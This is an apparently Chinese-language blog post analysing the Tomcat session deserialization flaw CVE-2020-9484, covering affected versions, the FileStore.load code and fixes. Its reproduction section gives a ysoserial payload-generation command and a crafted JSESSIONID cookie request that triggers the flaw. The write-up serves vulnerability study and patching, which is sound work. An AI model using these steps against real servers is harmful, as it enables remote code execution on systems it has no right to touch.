Tomcat反序列化漏洞

已于 2022-06-13 22:56:09 修改
阅读量1.3k 收藏 2
点赞数
分类专栏: Tomcat 文章标签: tomcat 安全 java
于 2021-07-19 23:33:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kaishizhangcheng/article/details/118917169
版权

Tomcat反序列化漏洞

CVE-2020-9484

漏洞简介

当使用tomcat时,如果使用了tomcat提供的session持久化功能,如果存在文件上传功能,恶意请求者通过一个流程,将能发起一个恶意请求造成服务端远程命令执行.

影响版本
<= 9.0.34
<= 8.5.54
<= 7.0.103

漏洞分析

配置的className=“org.apache.catalina.session.FileStore”

查看FileStore的load方法,代码如下

public Session load(String id) throws ClassNotFoundException, IOException {
    // Open an input stream to the specified pathname, if any
    File file = file(id);
    Context context = (Context) getManager().getContainer();
    FileInputStream fis = null;
    ObjectInputStream ois = null;
    Loader loader = null;
    ClassLoader classLoader = null;
    ClassLoader oldThreadContextCL = Thread.currentThread().getContextClassLoader();
    try {
        fis = new FileInputStream(file.getAbsolutePath());
        loader = context.getLoader();
        ois = getObjectInputStream(fis);

        StandardSession session = (StandardSession) manager.createEmptySession();
        session.readObjectData(ois);
        session.setManager(manager);
        return session;
    }
}

load方法中
根据打开名为id的文件,将文件中的内容作为反序列化的输入.
但是tomcat未过滤诸如…/等危险目录.
如果配合任意文件上传,调用JSESSION让tomcat加载该上传文件,即可完成反序列化攻击.

在新版tomcat中,通过验证JSESSION的路径,解决该反序列化漏洞.

复现

  1. 使用ysoserial生成一个反序列化文件
    java -jar ysoserial.jar CommonsCollections2 “calc” > /tmp/22222.session

  2. 通过JSESSION加载恶意的session持久化文件
    GET /bug/api HTTP/1.1
    Host: 127.0.0.1:8080
    Cookie: JSESSIONID=evilFIle

修复方案

检查是否使用tomcat的session持久化功能,如果有,建议关闭
升级tomcat至最新版本

FlyingZCC
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
14-2 tomcat反序列化
weixin_43263566的博客
12-07 856
Apache Tomcat反序列化漏洞Apache Tomcat服务器中使用了自带session同步功能的配置,且没有使用Encrypt Interceptor加密拦截器的情况下。Apache Tomcat是一个基于Java的Web应用软件容器,用于运行servlet和JSP Web应用。当Tomcat使用了自带session同步功能时,并且未配置安全设置(缺少Encrypt Interceptor加密拦截器),存在反序列化漏洞
Tomcat Session(CVE-2020-9484)反序列化
m0_48520508的博客
08-01 1105
0x01简介 Apache Tomcat最早是由Sun Microsystems开发的一个Servlet容器,在1999年被捐献给ASF(Apache Software Foundation),隶属于Jakarta项目,现在已经独立为一个顶级项目。Tomcat主要实现了Java EE中的Servlet、JSP规范,同时也提供HTTP服务,是市场上非常流行的Java Web容器。 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被
tomcat session反序列化漏洞分析
bylfsj的博客
06-02 2517
<p></p><h1>CVE-2020-9484 tomcat session反序列化漏洞</h1> 漏洞通告 可以看到利用条件较为苛刻,并且在复现的时候需要做一定配置 修改PersistenceManager配置,这个配置是在tomcat目录的conf目录中的context.xml中配置的,根据官网的配置方法,做如下配置 这样2,3条件满足了,之后配置tomcat的debug环境即可 漏洞分析 一般文件存储sessio...
中间件安全Tomcat常见漏洞
最新发布
ZL_1618的博客
06-24 670
链接。
Tomcat Session(CVE-2020-9484)反序列化漏洞复现
热门推荐
qq_40898302的博客
04-20 1万+
一、漏洞介绍 北京时间2020年05月20日,Apache官方发布了 Apache Tomcat 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-9484。 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功...
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞
weixin_56306210的博客
04-12 965
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞
Shiro反序列化漏洞,Shiro版本升级资源
06-22
从上面我们了解到,反序列化漏洞主要是由于硬编码引起的,那么只要解决硬编码,就解决了该漏洞。解决硬编码主要有两种方式: 方法一:自行实现key值 方法二:升级到1.2.5版本或以上 那么在我的项目中,选择的是升级...
tomcat-cluster-session-sync-exp:tomcat使用了自带会话同步功能时,不安全的配置(没有使用EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包,可以对使用了tomcat自带会话同步功能的服务器进行攻击。
03-19
这是一个tomcat使用了自带会话同步功能时,不安全的配置(没有使用EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包,可以对使用了tomcat自带会话同步功能的服务器进行攻击。 使用 先编译出jar包...
tomcat漏洞总结.rar
04-21
本文件包含Tomcat近几年爆发的4个严重漏洞,包含从tomcat弱口令上传,到tomcatPUT上传小马,本地权限提升一级反序列化漏洞,其中弱口令包含2本字典以及详细用法,PUT上传包含POC,反序列化和权限提升包含代码及详细...
learnjavabug:Java安全相关的漏洞和技术demo,原生Java、Fastjson、Jackson、Hessian2、XML反序列化漏洞利用和Spring、Dubbo、Shiro、CAS、Tomcat、RMI、Nexus等框架\中间件\功能的exploits以及Java Security Manager绕过、Dubbo-Hessian2安全加固等等实践代码
05-01
这是一个个人用于复现、公开一些感兴趣、或者影响稍大的漏洞的项目,没有多少技术含量,权当个人技术笔记。 fastjson 该模块主要记录一些fastjson的利用gadget,不过很多gadget并没有记录在案。 RCE相关 package:...
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Web应用软件的基于Java的Web应用软件容器。0x02 漏洞概述这次是由于错误配置和 org.apache
反序列化漏洞原理_Apache Tomcat Session 反序列化远程代码执行漏洞
weixin_39690105的博客
12-01 207
点击蓝字关注我们漏洞信息漏洞名称:Apache Tomcat Session 反序列化远程代码执行漏洞发布日期:2020.05.21威胁类型:远程代码执行危险等级:高危漏洞ID:CVE-2020-9484受影响的版本:Apache Tomcat 10.0.0-M1—10.0.0-M4Apache Tomcat 9.0.0.M1—9.0.34Apache Tomcat 8.5.0—8.5....
[Java安全]—Tomcat反序列化注入回显内存马
Sentiment的博客
12-03 1032
在之前学的tomcat filter、listener、servlet等内存马中,其实并不算真正意义上的内存马,因为Web服务器在编译jsp文件时生成了对应的class文件,因此进行了文件落地。所以本篇主要是针对于反序列化进行内存马注入来达到无文件落地的目的,而的和可以直接获取,但是反序列化的时候却不能,所以回显问题便需要考虑其中。既然无法直接获取request和response变量,所以就需要找一个存储请求信息的变量,根据kingkk师傅的思路,在中找到了: 并且这两个变量是静态的,因此省去了获取对象实例
java反序列化漏洞 tomcat_Tomcat反序列化漏洞(CVE-2016-8735)
weixin_29189373的博客
02-16 1130
CVE-2016-8735漏洞描述:该漏洞与之前Oracle发布的 mxRemoteLifecycleListener 反序列化漏洞(CVE-2016-3427)相关,是由于使用了JmxRemoteLifecycleListener 的监听功能所导致。而在Oracle官方发布修复后,Tomcat未能及时修复更新而导致的远程代码执行。该漏洞所造成的最根本原因是Tomcat在配置JMX做监控时使用了 ...
java反序列化漏洞 tomcat_CVE-2020-9484 Apache Tomcat反序列化漏洞浅析
weixin_39760919的博客
02-16 301
本文是i春秋论坛作家「Ybwh」表哥原创的一篇技术文章,浅析CVE-2020-9484 Apache Tomcat反序列化漏洞。01漏洞概述这次是因为错误配置和org.apache.catalina.session.FileStore的LFI和反序列化漏洞引起的RCE。当配置了org.apache.catalina.session.PersistentManager并且使用org.apache.c...
Tomcat反序列化漏洞(CVE-2016-8735)
谢公子的博客
09-23 6895
目录​​​​​​​ CVE-2016-8735 漏洞复现 漏洞修复: CVE-2016-8735 漏洞描述: 该漏洞与之前Oracle发布的 mxRemoteLifecycleListener 反序列化漏洞(CVE-2016-3427)相关,是由于使用了JmxRemoteLifecycleListener 的监听功能所导致。而在Oracle官方发布修复后,Tomcat未能及时修复更新而...
Tomcat-Session反序列化学习
feng的博客
03-02 1434
Tomcat-Session反序列化学习 简介 CVE-2020-9484。 要求: tomcat必须启用session持久化功能FileStore tomcat/lib或者WEB-INF/lib目录下的依赖存在可用的gadget 在服务器上存在已知路径文件内容可控 漏洞分析 漏洞比较简单就直接提一下,具体的代码可以自己分析。 当开启了session持久化功能FileStore的时候: <?xml version="1.0" encoding="UTF-8"?> <!-
漏洞预警】Apache Tomcat Cluster 不安全配置导致反序列化代码执行漏洞修复方案
讯开技术孵化器博客
05-21 1893
Apache Tomcat Cluster 漏洞修复漏洞描述安全建议 漏洞描述 2020年5月21日,阿里云应急响应中心监测到某安全研究人员披露Apache Tomcat在一定条件下使用自带session同步功能时存在反序列化代码执行漏洞,并在GitHub上公布该漏洞远程命令执行可利用EXP程序,风险较大。 Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。当Apache Tomcat集群使用了自带session同步功能,并且没有使用EncryptInter
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FlyingZCC

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值